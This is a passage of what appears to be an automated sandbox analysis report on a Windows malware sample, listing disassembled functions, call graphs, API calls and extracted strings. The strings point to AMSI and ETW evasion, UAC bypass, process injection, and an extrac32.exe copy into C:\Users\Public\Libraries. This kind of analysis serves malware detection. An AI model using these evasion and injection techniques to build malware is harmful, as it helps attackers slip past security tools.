                                                                                                                                                                                      • Part of subcall function 03247BE8: LoadLibraryW.KERNEL32(?,00000000,03247C9A), ref: 03247C18
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetModuleHandleW.KERNEL32(?,?,00000000,03247C9A), ref: 03247C1E
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,03247C9A), ref: 03247C37
                                                                                                                                                                                      • Part of subcall function 03237E18: GetFileAttributesA.KERNEL32(00000000,?,0324E0EE,ScanString,03295344,03258FEC,OpenSession,03295344,03258FEC,ScanString,03295344,03258FEC,UacScan,03295344,03258FEC,UacInitialize), ref: 03237E23
                                                                                                                                                                                      • Part of subcall function 0323C320: GetModuleFileNameA.KERNEL32(00000000,?,00000105,032955F0,?,0324E40F,ScanBuffer,03295344,03258FEC,OpenSession,03295344,03258FEC,ScanBuffer,03295344,03258FEC,OpenSession), ref: 0323C337
                                                                                                                                                                                      • Part of subcall function 0324C4DC: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0324C5AC), ref: 0324C517
                                                                                                                                                                                      • Part of subcall function 0324C4DC: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0324C5AC), ref: 0324C547
                                                                                                                                                                                      • Part of subcall function 0324C4DC: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0324C55C
                                                                                                                                                                                      • Part of subcall function 0324C4DC: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0324C588
                                                                                                                                                                                      • Part of subcall function 0324C4DC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0324C591
                                                                                                                                                                                      • Part of subcall function 03237E3C: GetFileAttributesA.KERNEL32(00000000,?,03251133,ScanString,03295344,03258FEC,OpenSession,03295344,03258FEC,OpenSession,03295344,03258FEC,ScanBuffer,03295344,03258FEC,ScanString), ref: 03237E47
                                                                                                                                                                                      • Part of subcall function 03238004: CreateDirectoryA.KERNEL32(00000000,00000000,?,03251324,ScanBuffer,03295344,03258FEC,OpenSession,03295344,03258FEC,Initialize,03295344,03258FEC,ScanString,03295344,03258FEC), ref: 03238011
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AttributesModuleNamePath$AddressCloseCreateDirectoryHandleInetInformationLibraryLoadName_OfflineOpenProcQueryRead
                                                                                                                                                                                    • String ID: .url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$bcrypt$can$endpointdlp$http$ieproxy$iexpress.exe$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                                                                                    • API String ID: 2725267379-582383607
                                                                                                                                                                                    • Opcode ID: d516c37dbde887af56da4a7eccc8c9c528be5c388ed177d6c32cb5c16f5c1b7e
                                                                                                                                                                                    • Instruction ID: daa2a4e0cfcd708ac872c91d7a1f7576a9c3d929c86dbbfb92bb2a844e03f07a
                                                                                                                                                                                    • Opcode Fuzzy Hash: d516c37dbde887af56da4a7eccc8c9c528be5c388ed177d6c32cb5c16f5c1b7e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0604EB79A64359CFCB14FB65DC80ADD73B5AB8A314F5081E2A408EB654DBB0AEC1CF50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03255FA0 Relevance: 142.6, APIs: 3, Strings: 77, Instructions: 2643COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 4522 3255fa0-325618a call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 4577 3256190-325638f call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 32348b0 4522->4577 4578 325618b call 3247be8 4522->4578 4637 3256395-32569b4 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3232ee0 call 3232f08 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 GetCurrentProcess call 3247968 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 4577->4637 4638 3256b54-3256cd7 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 32348b0 4577->4638 4578->4577 5164 32569b6-32569b9 4637->5164 5165 32569bb-3256b4f call 32349bc call 324c5bc call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 EnumSystemLocalesA 4637->5165 4727 3256cdd-3256cec call 32348b0 4638->4727 4728 32574a8-3258b96 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 * 16 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 ExitProcess 4638->4728 4727->4728 4736 3256cf2-3256fc5 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 324d198 call 3234824 call 3234964 call 3234698 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3237e18 4727->4736 4979 32572a2-32574a3 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 32349bc call 3247f48 4736->4979 4980 3256fcb-325729d call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 324c74c call 32344f4 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234da4 * 2 call 3234728 call 324c3f8 4736->4980 4979->4728 4980->4979 5164->5165 5165->4638
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03247BE8: LoadLibraryW.KERNEL32(?,00000000,03247C9A), ref: 03247C18
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetModuleHandleW.KERNEL32(?,?,00000000,03247C9A), ref: 03247C1E
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,03247C9A), ref: 03247C37
                                                                                                                                                                                      • Part of subcall function 03232EE0: QueryPerformanceCounter.KERNEL32 ref: 03232EE4
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,17D78400,00001000,00000040,ScanBuffer,03295344,03258FEC,OpenSession,03295344,03258FEC,UacScan,03295344,03258FEC,ScanBuffer,03295344,03258FEC), ref: 0325681D
                                                                                                                                                                                      • Part of subcall function 03247968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 03247975
                                                                                                                                                                                      • Part of subcall function 03247968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0324797B
                                                                                                                                                                                      • Part of subcall function 03247968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0324799B
                                                                                                                                                                                    • EnumSystemLocalesA.C:\WINDOWS\SYSTEM32\KERNELBASE(15CA0000,00000000,ScanBuffer,03295344,03258FEC,OpenSession,03295344,03258FEC,UacScan,03295344,03258FEC,ScanBuffer,03295344,03258FEC,OpenSession,03295344), ref: 03256B4F
                                                                                                                                                                                      • Part of subcall function 03237E18: GetFileAttributesA.KERNEL32(00000000,?,0324E0EE,ScanString,03295344,03258FEC,OpenSession,03295344,03258FEC,ScanString,03295344,03258FEC,UacScan,03295344,03258FEC,UacInitialize), ref: 03237E23
                                                                                                                                                                                      • Part of subcall function 0324C3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0324C4CA), ref: 0324C437
                                                                                                                                                                                      • Part of subcall function 0324C3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0324C471
                                                                                                                                                                                      • Part of subcall function 0324C3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0324C49E
                                                                                                                                                                                      • Part of subcall function 0324C3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0324C4A7
                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000,ScanBuffer,03295344,03258FEC,OpenSession,03295344,03258FEC,Initialize,03295344,03258FEC,ScanString,03295344,03258FEC,OpenSession,03295344,03258FEC), ref: 03258B96
                                                                                                                                                                                      • Part of subcall function 03234C24: SysFreeString.OLEAUT32(0324D42C), ref: 03234C32
                                                                                                                                                                                      • Part of subcall function 03234C3C: SysFreeString.OLEAUT32 ref: 03234C4F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AddressFreeHandleModulePathProcProcessString$AllocateAttributesCloseCounterCreateCurrentEnumExitLibraryLoadLocalesMemoryNameName_PerformanceQuerySystemVirtualWrite
                                                                                                                                                                                    • String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$bcrypt$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                                                                    • API String ID: 3496465935-2845693168
                                                                                                                                                                                    • Opcode ID: 8c6781af37beaa3122ab573ffc00b19aacaa816ec5acbccf18292a9f2fdaa5d4
                                                                                                                                                                                    • Instruction ID: 0506b2eade6aa8d96675ba806e70a037041b886676a6f6db3380ced8c292375e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c6781af37beaa3122ab573ffc00b19aacaa816ec5acbccf18292a9f2fdaa5d4
                                                                                                                                                                                    • Instruction Fuzzy Hash: C943E979A24259CFCB14FB65DC809DD73B9AB8A300F5085E2A418EB654DBB0AFC5CF50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03235A90 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 8865 3235a90-3235ad1 GetModuleFileNameA RegOpenKeyExA 8866 3235b13-3235b56 call 32358cc RegQueryValueExA 8865->8866 8867 3235ad3-3235aef RegOpenKeyExA 8865->8867 8872 3235b7a-3235b94 RegCloseKey 8866->8872 8873 3235b58-3235b74 RegQueryValueExA 8866->8873 8867->8866 8869 3235af1-3235b0d RegOpenKeyExA 8867->8869 8869->8866 8871 3235b9c-3235bcd lstrcpynA GetThreadLocale GetLocaleInfoA 8869->8871 8874 3235bd3-3235bd7 8871->8874 8875 3235cb6-3235cbd 8871->8875 8873->8872 8876 3235b76 8873->8876 8878 3235be3-3235bf9 lstrlenA 8874->8878 8879 3235bd9-3235bdd 8874->8879 8876->8872 8880 3235bfc-3235bff 8878->8880 8879->8875 8879->8878 8881 3235c01-3235c09 8880->8881 8882 3235c0b-3235c13 8880->8882 8881->8882 8883 3235bfb 8881->8883 8882->8875 8884 3235c19-3235c1e 8882->8884 8883->8880 8885 3235c20-3235c46 lstrcpynA LoadLibraryExA 8884->8885 8886 3235c48-3235c4a 8884->8886 8885->8886 8886->8875 8887 3235c4c-3235c50 8886->8887 8887->8875 8888 3235c52-3235c82 lstrcpynA LoadLibraryExA 8887->8888 8888->8875 8889 3235c84-3235cb4 lstrcpynA LoadLibraryExA 8888->8889 8889->8875
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,03230000,0325B790), ref: 03235AAC
                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 03235ACA
                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 03235AE8
                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03235B06
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32 ref: 03235B4F
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32 ref: 03235B6D
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 03235B8F
                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03235BAC
                                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 03235BB9
                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 03235BBF
                                                                                                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 03235BEA
                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03235C31
                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 03235C41
                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03235C69
                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 03235C79
                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 03235C9F
                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 03235CAF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                    • API String ID: 1759228003-2375825460
                                                                                                                                                                                    • Opcode ID: d726807142cca96d65e3feaf9e64eb0ffbf895a336b570c366a744a583e46bae
                                                                                                                                                                                    • Instruction ID: b16bbbdd990e8e9c99d9a8eea1fba3541e4abc38649ad6989a84398e5c496c1e
                                                                                                                                                                                    • Opcode Fuzzy Hash: d726807142cca96d65e3feaf9e64eb0ffbf895a336b570c366a744a583e46bae
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1551EAF5A2031D7EFB21D6A4CC45FEF77AC8B07740F1405A1AA04E7181D6B4AAC48BA0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0324CA6C Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 400processsynchronizationCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 10599 324ca6c-324ca70 10600 324ca75-324ca7a 10599->10600 10600->10600 10601 324ca7c-324cf2f call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234704 * 2 call 3234824 call 323473c call 3233098 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234704 call 3237ee8 call 3234964 call 3234d38 call 3234db4 call 3234704 call 3234964 call 3234d38 call 3234db4 CreateProcessAsUserW call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 10600->10601 10762 324cf35-324d035 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 WaitForSingleObject CloseHandle * 2 10601->10762 10763 324d03a-324d087 call 32344c4 call 3234c24 call 32344c4 call 3234c24 call 32344c4 10601->10763 10762->10763
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03247BE8: LoadLibraryW.KERNEL32(?,00000000,03247C9A), ref: 03247C18
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetModuleHandleW.KERNEL32(?,?,00000000,03247C9A), ref: 03247C1E
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,03247C9A), ref: 03247C37
                                                                                                                                                                                    • CreateProcessAsUserW.ADVAPI32 ref: 0324CDD3
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000002CC,000000FF,ScanString,03295344,0324D0A4,OpenSession,03295344,0324D0A4,ScanString,03295344,0324D0A4,OpenSession,03295344,0324D0A4,UacScan,03295344), ref: 0324D01F
                                                                                                                                                                                    • CloseHandle.KERNEL32(000002CC), ref: 0324D02A
                                                                                                                                                                                    • CloseHandle.KERNEL32(000002D0), ref: 0324D035
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
